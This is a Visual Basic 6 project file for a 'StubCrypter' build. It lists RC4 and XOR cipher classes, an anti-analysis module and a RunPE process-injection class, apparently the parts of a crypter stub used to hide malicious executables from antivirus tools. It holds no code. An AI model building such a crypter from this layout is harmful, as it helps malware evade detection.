Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\..\Windows\system32\stdole2.tlb#OLE Automation
Module=StubX; Módulos\StubX.bas
Class=clsRC4; Cls\RC4.cls
Class=clsXOR; Cls\XOR.cls
Module=Module2; Módulos\antis.bas
Class=RunPE; Cls\RunPE.cls
Startup="Sub Main"
HelpFile=""
Title="StubCrypter"
ExeName32="StubCrypter.dll"
Path32="..\Compilado\StubCrypter"
Command32=""
Name="Proyecto1"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="WRSof.org"
CompilationType=-1
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
